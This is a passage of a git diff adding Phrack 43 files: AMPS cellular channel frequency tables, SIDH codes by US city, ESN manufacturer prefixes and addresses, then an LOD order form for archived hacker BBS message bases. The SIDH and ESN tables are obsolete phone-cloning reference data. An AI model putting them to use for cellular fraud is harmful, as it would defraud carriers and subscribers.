+Channel 2 (365) Tx 880.950 Rx 835.950
+Channel 3 (386) Tx 881.580 Rx 836.580
+Channel 4 (407) Tx 882.210 Rx 837.210
+Channel 5 (428) Tx 882.840 Rx 837.840
+Channel 6 (449) Tx 883.470 Rx 838.470
+Channel 7 (470) Tx 884.100 Rx 839.100
+Channel 8 (491) Tx 884.730 Rx 839.730
+Channel 9 (512) Tx 885.360 Rx 840.360
+Channel 10 (533) Tx 885.990 Rx 840.990
+Channel 11 (554) Tx 886.620 Rx 841.620
+Channel 12 (575) Tx 887.250 Rx 842.250
+Channel 13 (596) Tx 887.880 Rx 842.880
+Channel 14 (617) Tx 888.510 Rx 843.510
+Channel 15 (638) Tx 889.140 Rx 844.140
+Channel 16 (659) Tx 889.770 Rx 844.770
+
+Cell # 12
+--------------------------------------------------
+Channel 1 (345) Tx 880.350 Rx 835.350
+Channel 2 (366) Tx 880.980 Rx 835.980
+Channel 3 (387) Tx 881.610 Rx 836.610
+Channel 4 (408) Tx 882.240 Rx 837.240
+Channel 5 (429) Tx 882.870 Rx 837.870
+Channel 6 (450) Tx 883.500 Rx 838.500
+Channel 7 (471) Tx 884.130 Rx 839.130
+Channel 8 (492) Tx 884.760 Rx 839.760
+Channel 9 (513) Tx 885.390 Rx 840.390
+Channel 10 (534) Tx 886.020 Rx 841.020
+Channel 11 (555) Tx 886.650 Rx 841.650
+Channel 12 (576) Tx 887.280 Rx 842.280
+Channel 13 (597) Tx 887.910 Rx 842.910
+Channel 14 (618) Tx 888.540 Rx 843.540
+Channel 15 (639) Tx 889.170 Rx 844.170
+Channel 16 (660) Tx 889.800 Rx 844.800
+
+Cell # 13
+--------------------------------------------------
+Channel 1 (346) Tx 880.380 Rx 835.380
+Channel 2 (367) Tx 881.010 Rx 836.010
+Channel 3 (388) Tx 881.640 Rx 836.640
+Channel 4 (409) Tx 882.270 Rx 837.270
+Channel 5 (430) Tx 882.900 Rx 837.900
+Channel 6 (451) Tx 883.530 Rx 838.530
+Channel 7 (472) Tx 884.160 Rx 839.160
+Channel 8 (493) Tx 884.790 Rx 839.790
+Channel 9 (514) Tx 885.420 Rx 840.420
+Channel 10 (535) Tx 886.050 Rx 841.050
+Channel 11 (556) Tx 886.680 Rx 841.680
+Channel 12 (577) Tx 887.310 Rx 842.310
+Channel 13 (598) Tx 887.940 Rx 842.940
+Channel 14 (619) Tx 888.570 Rx 843.570
+Channel 15 (640) Tx 889.200 Rx 844.200
+Channel 16 (661) Tx 889.830 Rx 844.830
+
+Cell # 14
+--------------------------------------------------
+Channel 1 (347) Tx 880.410 Rx 835.410
+Channel 2 (368) Tx 881.040 Rx 836.040
+Channel 3 (389) Tx 881.670 Rx 836.670
+Channel 4 (410) Tx 882.300 Rx 837.300
+Channel 5 (431) Tx 882.930 Rx 837.930
+Channel 6 (452) Tx 883.560 Rx 838.560
+Channel 7 (473) Tx 884.190 Rx 839.190
+Channel 8 (494) Tx 884.820 Rx 839.820
+Channel 9 (515) Tx 885.450 Rx 840.450
+Channel 10 (536) Tx 886.080 Rx 841.080
+Channel 11 (557) Tx 886.710 Rx 841.710
+Channel 12 (578) Tx 887.340 Rx 842.340
+Channel 13 (599) Tx 887.970 Rx 842.970
+Channel 14 (620) Tx 888.600 Rx 843.600
+Channel 15 (641) Tx 889.230 Rx 844.230
+Channel 16 (662) Tx 889.860 Rx 844.860
+
+Cell # 15
+--------------------------------------------------
+Channel 1 (348) Tx 880.440 Rx 835.440
+Channel 2 (369) Tx 881.070 Rx 836.070
+Channel 3 (390) Tx 881.700 Rx 836.700
+Channel 4 (411) Tx 882.330 Rx 837.330
+Channel 5 (432) Tx 882.960 Rx 837.960
+Channel 6 (453) Tx 883.590 Rx 838.590
+Channel 7 (474) Tx 884.220 Rx 839.220
+Channel 8 (495) Tx 884.850 Rx 839.850
+Channel 9 (516) Tx 885.480 Rx 840.480
+Channel 10 (537) Tx 886.110 Rx 841.110
+Channel 11 (558) Tx 886.740 Rx 841.740
+Channel 12 (579) Tx 887.370 Rx 842.370
+Channel 13 (600) Tx 888.000 Rx 843.000
+Channel 14 (621) Tx 888.630 Rx 843.630
+Channel 15 (642) Tx 889.260 Rx 844.260
+Channel 16 (663) Tx 889.890 Rx 844.890
+
+Cell # 16
+--------------------------------------------------
+Channel 1 (349) Tx 880.470 Rx 835.470
+Channel 2 (370) Tx 881.100 Rx 836.100
+Channel 3 (391) Tx 881.730 Rx 836.730
+Channel 4 (412) Tx 882.360 Rx 837.360
+Channel 5 (433) Tx 882.990 Rx 837.990
+Channel 6 (454) Tx 883.620 Rx 838.620
+Channel 7 (475) Tx 884.250 Rx 839.250
+Channel 8 (496) Tx 884.880 Rx 839.880
+Channel 9 (517) Tx 885.510 Rx 840.510
+Channel 10 (538) Tx 886.140 Rx 841.140
+Channel 11 (559) Tx 886.770 Rx 841.770
+Channel 12 (580) Tx 887.400 Rx 842.400
+Channel 13 (601) Tx 888.030 Rx 843.030
+Channel 14 (622) Tx 888.660 Rx 843.660
+Channel 15 (643) Tx 889.290 Rx 844.290
+Channel 16 (664) Tx 889.920 Rx 844.920
+
+Cell # 17
+--------------------------------------------------
+Channel 1 (350) Tx 880.500 Rx 835.500
+Channel 2 (371) Tx 881.130 Rx 836.130
+Channel 3 (392) Tx 881.760 Rx 836.760
+Channel 4 (413) Tx 882.390 Rx 837.390
+Channel 5 (434) Tx 883.020 Rx 838.020
+Channel 6 (455) Tx 883.650 Rx 838.650
+Channel 7 (476) Tx 884.280 Rx 839.280
+Channel 8 (497) Tx 884.910 Rx 839.910
+Channel 9 (518) Tx 885.540 Rx 840.540
+Channel 10 (539) Tx 886.170 Rx 841.170
+Channel 11 (560) Tx 886.800 Rx 841.800
+Channel 12 (581) Tx 887.430 Rx 842.430
+Channel 13 (602) Tx 888.060 Rx 843.060
+Channel 14 (623) Tx 888.690 Rx 843.690
+Channel 15 (644) Tx 889.320 Rx 844.320
+Channel 16 (665) Tx 889.950 Rx 844.950
+
+Cell # 18
+--------------------------------------------------
+Channel 1 (351) Tx 880.530 Rx 835.530
+Channel 2 (372) Tx 881.160 Rx 836.160
+Channel 3 (393) Tx 881.790 Rx 836.790
+Channel 4 (414) Tx 882.420 Rx 837.420
+Channel 5 (435) Tx 883.050 Rx 838.050
+Channel 6 (456) Tx 883.680 Rx 838.680
+Channel 7 (477) Tx 884.310 Rx 839.310
+Channel 8 (498) Tx 884.940 Rx 839.940
+Channel 9 (519) Tx 885.570 Rx 840.570
+Channel 10 (540) Tx 886.200 Rx 841.200
+Channel 11 (561) Tx 886.830 Rx 841.830
+Channel 12 (582) Tx 887.460 Rx 842.460
+Channel 13 (603) Tx 888.090 Rx 843.090
+Channel 14 (624) Tx 888.720 Rx 843.720
+Channel 15 (645) Tx 889.350 Rx 844.350
+Channel 16 (666) Tx 889.980 Rx 844.980
+
+Cell # 19
+--------------------------------------------------
+Channel 1 (352) Tx 880.560 Rx 835.560
+Channel 2 (373) Tx 881.190 Rx 836.190
+Channel 3 (394) Tx 881.820 Rx 836.820
+Channel 4 (415) Tx 882.450 Rx 837.450
+Channel 5 (436) Tx 883.080 Rx 838.080
+Channel 6 (457) Tx 883.710 Rx 838.710
+Channel 7 (478) Tx 884.340 Rx 839.340
+Channel 8 (499) Tx 884.970 Rx 839.970
+Channel 9 (520) Tx 885.600 Rx 840.600
+Channel 10 (541) Tx 886.230 Rx 841.230
+Channel 11 (562) Tx 886.860 Rx 841.860
+Channel 12 (583) Tx 887.490 Rx 842.490
+Channel 13 (604) Tx 888.120 Rx 843.120
+Channel 14 (625) Tx 888.750 Rx 843.750
+Channel 15 (646) Tx 889.380 Rx 844.380
+
+Cell # 20
+--------------------------------------------------
+Channel 1 (353) Tx 880.590 Rx 835.590
+Channel 2 (374) Tx 881.220 Rx 836.220
+Channel 3 (395) Tx 881.850 Rx 836.850
+Channel 4 (416) Tx 882.480 Rx 837.480
+Channel 5 (437) Tx 883.110 Rx 838.110
+Channel 6 (458) Tx 883.740 Rx 838.740
+Channel 7 (479) Tx 884.370 Rx 839.370
+Channel 8 (500) Tx 885.000 Rx 840.000
+Channel 9 (521) Tx 885.630 Rx 840.630
+Channel 10 (542) Tx 886.260 Rx 841.260
+Channel 11 (563) Tx 886.890 Rx 841.890
+Channel 12 (584) Tx 887.520 Rx 842.520
+Channel 13 (605) Tx 888.150 Rx 843.150
+Channel 14 (626) Tx 888.780 Rx 843.780
+Channel 15 (647) Tx 889.410 Rx 844.410
+
+Cell # 21
+--------------------------------------------------
+Channel 1 (354) Tx 880.620 Rx 835.620
+Channel 2 (375) Tx 881.250 Rx 836.250
+Channel 3 (396) Tx 881.880 Rx 836.880
+Channel 4 (417) Tx 882.510 Rx 837.510
+Channel 5 (438) Tx 883.140 Rx 838.140
+Channel 6 (459) Tx 883.770 Rx 838.770
+Channel 7 (480) Tx 884.400 Rx 839.400
+Channel 8 (501) Tx 885.030 Rx 840.030
+Channel 9 (522) Tx 885.660 Rx 840.660
+Channel 10 (543) Tx 886.290 Rx 841.290
+Channel 11 (564) Tx 886.920 Rx 841.920
+Channel 12 (585) Tx 887.550 Rx 842.550
+Channel 13 (606) Tx 888.180 Rx 843.180
+Channel 14 (627) Tx 888.810 Rx 843.810
+Channel 15 (648) Tx 889.440 Rx 844.440
+
+
+
+SIDH CODES
+
+CITY                    NON
+                   WIRELINE   WIRELINE
+
+Abaline, TX             131     422
+Aiken, GA               181     084
+Akron, OH               073     054
+Albany, GA              241     204
+Albany, NY              063     078
+Alburqueque, NM         079     110
+Alexandria, VA          243     212
+Allentown, PA           103     008
+Alton, IL               017     046
+Altoona, PA             247     032
+Amarillo, TX            249     422
+Anchorage, AK           251     234
+Anderson, SC            139     116
+Anniston, AL            255     098
+Appleton, WI            217     240
+Asheville, NC           263     246
+Ashland, WV             307     xxx
+Athens, AL              203     198
+Athens, GA              041     034
+Atlanta, GA             041     034
+Atlantic City, NJ       267     250
+Augusta, GA             181     084
+Aurora, IL              001     020
+Austin, TX              107     164
+Bakersfield, CA         183     228
+Baltimore, MD           013     018
+Bangor, ME              271     254
+Baton Rouge, LA         085     106
+Battle Creek, MI        403     256
+Beaumont, TX            185     012
+Bellingham, WA          047     006
+Beloit, WI              217     210
+Benton Harbor, MI       277     260
+Biddeford, ME           501     484
+Billings, MT            279     262
+Biloxi, MS              281     264
+Binghampton, NY         283     266
+Birmingham, AL          113     098
+Bishop, CA              1063    xxx
+Bismark, ND             285     268
+Bloomington, IL         455     532
+Boise, ID               289     272
+Boston, MA              007     028
+Bradenton, FL           175     042
+Bremerton, WA           047     006
+Bridgeport, CT          119     088
+Bristol, TN             149     042
+Brownsville, TX         451     434
+Bryan, TX               297     280
+Buffalo, NY             003     056
+Burlington, NC          069     144
+Burlington, VT          313     300
+Canton, OH              073     054
+Casper, WY              301     284
+Cedar Falls, IA         589     568
+Cedar Rapids, IA        303     286
+Champaign, IL           305     532
+Charleston, WV          307     290
+Charleston, SC          127     156
+Charlotte, NC           139     114
+Charlottesville, VA     309     292
+Chattanooga, TN         161     148
+Chicago, IL             001     020
+Cincinatti, OH          051     014
+Clarksville, TN         179     296
+Cleveland, OH           015     054
+College Station, TX     297     280
+Colorado Springs, CO    045     180
+Columbia, SC            189     182
+Columbus, GA            319     302
+Columbus, OH            133     138
+Corpus Christi, TX      191     184
+Council BLuffs, IA      137     152
+Cumberland, MD          321     304
+Dallas, TX              033     038
+Danville, VA            323     306
+Davenport, IA           193     186
+Dayton, OH              163     134
+Daytona Beach, FL       325     308
+Decatur, IL             327     532
+Dennison, TX            033     038
+Denver, CO              045     058
+Des Moines, IA          195     150
+Detroit, MI             021     010
+Dotham, AL              329     312
+Dubuque, IA             331     314
+Duluth, MN              333     316
+Durham, NC              069     144
+Eau Claire, WI          335     318
+Elgin, IL               001     020
+El Paso, TX             097     092
+Elkhart, IN             549     530
+Elmira, NY              283     266
+Enid, OK                341     324
+Erie, PA                343     326
+Eugene, OR              061     328
+Evansville, IN          197     190
+Fairbanks, AK           ---     1018
+Fargo, ND               347     330
+Fayettesville, NC       349     100
+Fayettesville, AR       607     342
+Flint, MI               021     010
+Florence, AL            351     334
+Florence, SC            377     350
+Fort Collins, CO        045     336
+Fort Lauderdale, FL     037     024
+Fort Myers, FL          355     042
+Fort Pierce, FL         037     340
+Fort Smith, AR          359     342
+Fort Walton Beach, FL   361     344
+Fort Wayne, IN          199     080
+Fort Worth, TX          033     038
+Fresno, CA              153     162
+Gainesville, FL         365     348
+Gadsden, AL             363     098
+Galveston, TX           367     012
+Glens Falls, NY         063     078
+Grand Forks, ND         371     356
+Grand Rapids, MI        021     244
+Granite City, IL        017     046
+Great Falls, MT         373     358
+Greeley, CO             045     360
+Green Bay, WI           217     362
+Greensboro, NC          095     142
+Greenville, SC          139     116
+Gulf of Mexico, LA      171     194
+Gulfport, MS            ---     264
+Gunterville, AL         203     198
+Hagerstown, MD          381     364
+Hamilton, OH            383     366
+Harlingen, TX           451     434
+Harrisburg, PA          159     096
+Hartford, CT            119     088
+Hickory, NC             385     368
+Hilo, HI                1161    060
+Holbrook, AZ            1027    ---
+Honolulu, HI            167     060
+Houma, LA               387     370
+Houston, TX             035     012
+Huntington, WV          307     196
+Huntsville, AL          203     198
+Indianapolis, IN        019     080
+Iowa City, IA           389     286
+Jackson, MI             391     374
+Jackson, MS             205     160
+Jacksonville, FL        075     136
+Jacksonville, NC        393     376
+Janesville, WI          217     210
+Jerseyville, IL         245     586
+Johnson City, TN        149     074
+Johnstown, PA           039     032
+Joliet, IL              001     020
+Joplin, MO              401     384
+Juneau, AK              ---     1022
+Kalamazoo, MI           403     386
+Kankakee, IL            001     020
+Kansas City, MO         059     052
+Kennewick, WA           ---     500
+Killeen, TX             409     392
+Kingsport, TN           149     074
+Knoxville, TN           093     104
+Kokomo, IN              411     080
+LaCross, WI             413     396
+Lafayette, IN           415     080
+Lafayette, LA           431     414
+Lake Charkes, LA        417     400
+Lakeland, FL            175     042
+Lancaster, PA           159     096
+Lansing, MI             021     188
+Laredo, TX              419     402
+Las Cruces, NM          097     404
+Las Vegas, NV           211     064
+Lawrence, KS            059     406
+Lawton, OK              425     408
+Lewiston, ME            427     482
+Lexington, KY           213     206
+Lihue, HI               1157    060
+Lincoln, NE             433     416
+Little Rock, AR         215     208
+Longview, TX            229     418
+Lorain, OH              437     054
+Los Angeles, CA         027     002
+Louisville, KY          065     076
+Lubbock, TX             439     422
+Lynchburg, VA           441     424
+Macon, GA               443     426
+Madison, WI             217     210
+Manchester, NH          445     428
+Mansfield, OH           447     430
+Marshall, TX            229     418
+McAllen, TX             451     434
+Medford, OR             061     436
+Melbourne, FL           175     068
+Memphis, TN             143     062
+Miami, FL               037     024
+Midland, TX             459     422
+Millville, NH           ---     250
+Milwaukee, WI           005     044
+Minneapolis, MN         023     026
+Mobile, AL              081     120
+Modesto, CA             233     224
+Moline, IL              193     186
+Monroe, LA              463     440
+Monterey, CA            527     126
+Montgomery, AL          465     444
+Moorehead, ND           ---     330
+Muncie, IN              467     080
+Muskegon, MI            021     448
+Nashua, NH              445     428
+Nashville, TN           179     118
+New Bedford, MA         119     028
+New Brunswick, NY       173     022
+New Haven, CT           119     088
+New Orleans, LA         057     036
+Newport News, VA        083     168
+New York, NY            025     022
+Norfolk, VA             083     168
+Ocala, FL               473     348
+Odessa, TX              475     422
+Oklahoma City, OK       169     146
+Olympia, WA             047     006
+Omaha, NE               137     152
+Orange County, NY       479     486
+Orlando, FL             175     068
+Ottawa, IL              1177    1178
+Oxnard, CA              027     002
+Panama City, FL         483     462
+Parkersburg, WV         485     032
+Pascagoula, MS          487     264
+Pasco, WA               ---     500
+Pensacola, FL           361     120
+Peoria, IL              221     214
+Petaluma, CA            031     040
+Petersburg, VA          071     472
+Philadelphia, PA        029     008
+Phoenix, AZ             053     048
+Pine Bluff, AR          493     208
+Pittsburg, PA           039     032
+Pittsfield, MA          119     480
+Placerville, CA         ---     1080
+Ponce, PR               497     082
+Portland, ME            499     482
+Portland, OR            061     030
+Portsmouth, NH          501     484
+Poughkeepsie, NY        503     486
+Providence, RI          119     028
+Provo, UT               091     488
+Pueblo, CO              045     490
+Raleigh, NC             069     144
+Rapid City, SD          511     494
+Reading, PA             103     008
+Redding, CA             513     294
+Reno, NV                515     498
+Richland, WA            517     500
+Richmond, VA            071     170
+Roanoke, VA             519     502
+Rochester, NH           501     484
+Rochester, MN           521     504
+Rochester, NY           117     154
+Rockford, IL            217     506
+Sacramento, CA          129     112
+Saginaw, MI             021     389
+Salem, OR               061     030
+Salinas, CA             527     040
+Salt Lake City, UT      091     094
+San Angelo, TX          529     510
+San Antonio, TX         151     122
+San Deigo, CA           043     004
+San Francisco, CA       031     040
+San Jose, CA            031     040
+San Juan, PR            227     218
+Santa Barbara, CA       531     040
+Santa Cruz, CA          031     126
+Santa Rosa, CA          031     040
+Sarasota, FL            175     142
+Savanna, GA             539     520
+Schenectady, NY         063     078
+Scranton, PA            103     172
+Seattle, WA             047     006
+Sharon, PA              089     126
+Sheboygan, WI           543     044
+Shreveport, LA          229     220
+Sioux City, IA          547     528
+Sioux Falls, SD         555     540
+South Bend, IA          549     530
+Spartanburg, SC         139     116
+Spokane, WA             231     222
+Springfield, IL         551     532
+Springfield, MO         559     546
+Springfield, OH         573     134
+Springfield, MA         119     188
+St. Cloud, MN           553     534
+St. Joseph, MO          059     536
+St. Louis, MO           017     046
+St. Petersberg, FL      175     042
+State College, PA       159     032
+Stuebenville, OH        039     032
+Stockton, CA            233     224
+Stroudsburg, PA         103     172
+Syracuse, NY            077     086
+Tacoma, WA              047     006
+Tallahassee, FL         565     544
+Tampa, FL               175     042
+Temple, TX              409     392
+Terre Haute, IN         567     080
+Texarkana, TX           229     550
+Toledo, OH              021     130
+Topeka, KS              059     552
+Trenton, PA             029     008
+Tucson, AZ              053     140
+Tulsa, OK               111     166
+Tuscaloosa, AL          577     098
+Ukiah, CA               1075    ---
+Utica, NY               235     226
+Vallejo, CA             031     040
+Victoria, TX            581     562
+Vineland, NJ            583     250
+Visalia, CA             153     162
+Waco, TX                587     566
+Warren, OH              089     126
+Washington, DC          013     018
+Waterloo, IA            589     568
+Wausau, WI              591     570
+West Palm Beach, FL     037     024
+Wheeling, WV            039     032
+Wichita Falls, TX       595     574
+Wichita, KS             165     070
+Wilkes Barr, PA         103     172
+Williamsport, PA        103     576
+Wilmington, DE          123     008
+Wilmington, NC          599     578
+Winston-Salem, NC       095     142
+Worcester, MA           007     028
+Yakima, WA              601     580
+York, PA                159     096
+Youngstown, OH          089     126
+Yuba City, CA           129     112
+
+
+ESN PREFIXES BY MANUFACTURER
+
+Manufacturer                    Decimal         Hex
+
+Alpine Electronics              150             96
+AT&T                            158             9E
+Audiovox-Audiotel               138             8A
+Blaupunkt                       148             94
+Clarion Company                 140             8C
+Clarion Manufacturing Co.       166             A6
+CM Communications               153             99
+Di-Bar Electronics              145             91
+E.F. Johnson                    131             83
+Emptel Electronics              178             B2
+Ericsson                        143             8F
+Ericsson GE Mobile              157             9D
+Fujitsu                         133             85
+Gateway Telephone               147             93
+General Electric                146             92
+Goldstar Products               141             8D
+Harris                          137             89
+Hitachi                         132             84
+Hughes Network Systems          164             A4
+Hyundai                         160             A0
+Japan Radio Co., Ltd.           152             98
+Kokusai                         139             8B
+Mansoor Electronics             167             A7
+Mobira                          156             9C
+Motorola                        130             82
+Motorola International          168             A8
+Mitsubishi                      134             86
+Murata Machinery                144             90
+NEC                             135             87
+Nokia                           165             A5
+Novatel                         142             8E
+OKI                             129             81
+Panasonic (Matsushita)          136             88
+Philips Circuit Assemblies      171             AB
+Philips Telecom                 170             AA
+Qualcomm                        159             9F
+Samsung Corp.                   176             B0
+Sanyo                           175             AF
+Satellite Technology Services   161             A1
+Shintom West                    174             AE
+Sony Corp.                      154             9A
+Tama Denki Co.                  155             9B
+Tecnhophone                     162             A2
+Uniden Corp. of America         172             AC
+Uniden Corp. of Japan           173             AD
+Universal Cellular              149             95
+Yupiteru Industries             163             A3
+
+
+Manufacturers' Addresses
+
+Alpine Electronics of America
+191456 Gramercy Place
+Torrance, CA 90501
+310-326-8000
+
+Antel Corporation
+400 Oser Avenus
+Hauppauge, NY 11788
+516-273-6800
+
+AT&T Consumer Products
+5 Woodhollow Drive
+Parsippany, NJ 07054
+201-581-3000
+
+Audiovox Corp.
+150 marcus Blvd.
+Hauppauge, NY 11788
+516-231-7750
+
+Blaupunkt
+Robert Bosch Corp.
+2800 S. 25th Avenue
+Broadview, IL 60153
+708-865-5200
+
+Clarion Corp. of America
+661 W. Redondo Beach Blvd.
+Gardena, CA 90247
+310-327-9100
+
+DiamondTel
+Mitsubishi Electronics of America
+800 Biermann Court
+Mt. Prospect, IL 60056
+708-298-9223
+
+Ericsson
+P.O. Box 4248
+Lynchburg, VA 24502
+800-CAR-FONE
+
+Fujitsu America, Inc.
+2801 Telecom Parkway
+Richardson, TX 75082
+214-690-9660
+
+GE Mobile Communications
+P.O. Box 4248
+Lyunchburg, VA 24502
+800-CAR-FONE
+
+GoldStar
+1850 W. Drake Drive
+Tempe, AZ 85283
+602-752-2200
+
+Hughes Network Systems
+11717 Exploration Lane
+Germantown, MD 20876
+301-428-5500
+
+Kenwood USA Corp.
+2201 E. Dominguez Street
+Long Beach, CA 90810
+310-639-9000
+
+Mitsubishi International
+1500 Michael Drive, Suite B
+Wood Dale, IL 60191
+708-860-4200
+
+Motorola, Inc.
+1475 W. Shure Drive
+Arlington Heights, IL 60004
+708-632-5000
+800-331-6456
+
+Muratec
+5560 Tennyson Parkway
+Plano, TX 75024
+214-403-3300
+
+NEC America, Inc.
+Mobile Radio Division
+383 Omni Drive
+Richardson, TX 75080
+214-907-4000
+
+Nokia Mobile Phones
+2300 Tall Pines Drive, Suite 120
+Largo, FL 34641
+813-536-5553
+
+NovAtel
+P.O. Box 1233
+Fort Worth, TX 76101
+817-847-2100
+
+OKI Telecom
+437 Old Peachtree Road
+Suwanee, GA 30174
+404-995-9800
+
+Omni Cellular
+96 S. Madison Street
+Carthage, IL 62321
+217-357-2308
+
+Panasonic Communications
+Two Panasonic Way
+Secaucus, NJ 07094
+201-348-7000
+
+Panasonic Company
+One Panasonic Way
+Secaucus, NJ 07096
+201-348-9090
+
+Pioneer Electronics
+2265 E. 220th Street
+Long Beach, CA 90810
+310-835-6177
+
+Sanyo
+21350 Lassen Street
+Chatsworth, CA 91311
+800-421-5013
+818-998-7200
+
+Shintom West
+20435 South Western Avenue
+Torrance, CA 90501
+310-328-7200
+
+Sony Corp. of America
+Sony Drive
+Park Ridge, NJ 07656
+201-930-1000
+
+Tandy Corp.
+700 One Tandy Center
+Fort Worth, TX 76102
+817-390-3300
+
+Technophone Corp.
+1801 Penn Street, Suite 3
+Melbourne, FL 32901
+407-952-2100
+
+Uniden America Corp.
+4700 Amon Carter Blvd.
+Fort Worth, TX 71655
+817-858-3300
\ No newline at end of file
diff --git a/phrack43/18.txt b/phrack43/18.txt
new file mode 100644
index 0000000..a96148f
--- /dev/null
+++ b/phrack43/18.txt
@@ -0,0 +1,469 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 18 of 27
+
+      The LOD Communications Underground H/P BBS Message Base Project:
+     Price Listing of Currently Available Message Bases and Order Form.
+                    Holdings List Version #1, 5/15/93
+
+
+   This file contains:
+
+     - Background information on the project;
+     - Currently completed message bases with prices; and,
+     - Order form and stipulations.
+
+   If you have already seen some of the background information contained in the
+following paragraphs, note that additional information has been added.  The aim
+was to make this file as self-contained as possible.  It is approximately seven
+pages in length (23K) and it should answer all of your questions.
+
+
+The Project:
+------------
+
+   Throughout history, physical objects have been preserved for posterity for
+the benefit of the next generation of humans.  Cyberspace, however, isn't very
+physical; data contained on floppy diskettes has a finite lifetime as does the
+technology to retrieve that data.  The earliest underground hacker bulletin
+board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s
+were state-of-the-art.  Today, it is difficult to find anyone who has one of
+these machines in operating condition, not to mention the brain cells left to
+recall how to operate them. :-(
+
+   LOD Communications has created a historical library of the "dark" portion of
+Cyberspace.  The project's goal is to acquire as much information as possible
+from underground Hack/Phreak (H/P) bulletin boards that were in operation
+during a decade long period, dating from the beginnings (in 1980/81 with 8BBS
+and MOM:  Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of
+Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90.
+Currently, messages from over 50 different BBSes have been retrieved, although
+very few message bases are 100% complete.  However, not having a complete "set"
+does not diminish their value.
+
+
+Who Benefits From This Information?:
+------------------------------------
+
+     - PARTICIPANTS who were on the various H/P BBSes may want to see their
+       contribution to history or reminisce about the "golden era" of hacking;
+
+     - ENTHUSIASTS who came into the "scene" after most of these boards were
+       down may want to see what they missed;
+
+     - COMPANIES who may want to see if their (or their competitors') phone
+       systems, computers, or networks were compromised;
+
+     - SECURITY PROFESSIONALS/LAW ENFORCEMENT who may want to see what
+       techniques were used to subvert computer security systems;
+
+     - SCHOOLS AND UNIVERSITIES (including their libraries) who may want to use
+       the information for research in sociology or computer science as well as
+       for educational purposes in courses such as Computer Law, Computer
+       Ethics, and Computer Security;
+
+     - AUTHORS/PRESS who may want to finally get the facts straight about
+       "hackers;" and,
+
+     - THE CURIOUS PUBLIC who may want to sneak a peek into the inner realm of
+       the Computer Underground, especially those Restricted Access BBSes and
+       their Private sub-boards where only a small handful of "the best"
+       resided.
+
+   Were the individuals involved in the Computer Underground out to start World
+War III, selling secrets to the Soviets, working with organized crime,
+conspiring to do evil, or just a bunch of bored teenagers with nothing better
+to do?  How much did they know, and how did they find it out?  Did they have
+the capability to shut down phone service of Area Code portions?  Could
+they ruin someone's credit?  Could they "move satellites in the heavens?"
+Could they monitor packet switching network conversations or YOUR
+conversations?  The answers lie within the messages themselves.
+
+
+Why is LODCOM Charging Money For The Message Bases?:
+----------------------------------------------------
+
+   As happens with most projects, the effort and monetary investment turned out
+to be substantially more than originally anticipated.  With all of the high-
+tech equipment available today, people sometimes forget that in the early
+1980s, 14.4K baud modems and 250 MB hard drives were just a fantasy for the
+home computer user.  Most messages Lodcom has recovered were downloaded at 300
+baud onto 143K disk drives, with each file usually no larger than 15K in size.
+One could not call a BBS and download the complete message base in 10 minutes
+and save it into one file.  Literally hundreds of man-hours have been spent
+copying dusty Apple ][ disks, transferring them to IBM (or typing in hard copy
+versions when electronic versions were unavailable), organizing over one
+thousand individual files (thus far) according to what BBS the messages were
+originally posted on, and splicing the files together.  Also, after consulting
+with the appropriate civil liberties organizations and our own legal counsel,
+a slight editing of the messages (restricted to long distance access codes,
+phone numbers, and computer passwords) had to be made to ensure that there is
+nothing illegal contained within the messages.  Every effort was made to keep
+the messages in their pristine condition:  40 columns, ALL CAPS, spelling
+errors, offensive language, inaccuracies of various kinds, and ALL.
+
+   Although a fairly comprehensive collection of the goings-on during a decade
+of public and private computer underground activity has been accomplished,
+there are more messages out there.  It is our wish to continue to document the
+History of the Computer Underground.  In order to do this, and in order to
+break even on what resources have already been expended (it is a LOT more than
+most people realize), a dollar value has been attached to each set of message
+bases.  The dollar values were kept as low as possible and range from $1.00 to
+$8.00 for each H/P BBS Message Base Set.  Without your understanding and
+support, this effort may not be able to sustain itself long enough to complete
+the project.  A large portion of any profits will be recycled for two other
+projects in the works, whose aim is to provide additional historical background
+on the Computer Underground Community.  That is, no one involved is quitting
+their day job :-)
+
+   One additional note:  For those who purchase the Metal Shop Private Message
+Base, 100% of the price ($4.00) will be donated to help pay for Craig Neidorf's
+(Knight Lightning) Legal Defense bills (due to his successful campaign to
+protect First Amendment rights for electronic publishing, i.e. the PHRACK/E911
+case).
+
+
+How The Prices Were Determined:
+-------------------------------
+
+Prices were determined based on the following considerations:
+
+     - The number of years ago that the BBS operated (affected availability);
+
+     - The total number of messages compiled (required more time to compile);
+
+     - Its popularity and message content (anticipated demand);
+
+     - Whether the BBS or portions thereof were deemed "elite" and, therefore,
+       restricted access to a small number of users (affected availability);
+       and,
+
+     - An additional factor to account for overhead costs such as diskettes,
+       diskette mailing containers, postage, time to fill orders, etc.
+
+
+What Each "Message Base File" Contains:
+---------------------------------------
+
+     - A two page general message explaining H/P BBS terminology and format.
+
+     - The BBS Pro-Phile:  A historical background and description of the BBS
+       either written by the original system operator(s) or those who actually
+       called the BBS when it was in operation (it took months to track the
+       appropriate people down and get them to write these specifically for
+       this project; lesser known BBSes may not contain a Pro-Phile);
+
+     - Messages posted to the BBS (i.e. the Message Base);
+
+     - Downloaded Userlists if available; and
+
+     - Hacking tutorials a.k.a. "G-Philes" that were on-line if available.
+
+
+   It is anticipated that most people who are interested in the message bases
+have never heard of a lot of the BBS names shown in the listing.  If you have
+seen one set of messages, you have NOT seen them ALL.  Each system had a unique
+personality, set of users, and each has something different to offer. If you
+decide to order the minimum, we recommend that you mix a high-priced base
+($7.00 or above) with a couple of medium-priced bases ($4.00 to $6.00) and a
+few lower-priced bases ($1.00 to $3.00).  This will provide you with a feel for
+what was happening over a broad range of years and message quality.  Of course,
+nothing beats the full set (offered at a discount, see order form).
+
+Formats the Message Base Files are Available in:
+------------------------------------------------
+
+   Due to the large size of the Message Base Files, they will be compressed
+using the format of your choice.  Please note that Lodcom does NOT include the
+compression/decompression program (PKZIP, PAK, etc.).  ASCII (decompressed)
+files will be provided for $2.00 extra to cover additional diskette and
+shipping costs.  The files are available for:
+
+     - IBM (5.25 or 3.5 inch)
+     - AMIGA (3.5 inch)
+     - APPLE MACINTOSH (3.5 inch)
+     - PAPER versions can be ordered but cost triple (due to increased shipping
+       costs, time to print order, and messages being in 40 column format and
+       therefore wasting lots of paper...save those trees!).  Paper versions
+       take twice the time to deliver but are laser printed.
+
+Orders are expected to arrive at the requesters' physical mail box in 2-4
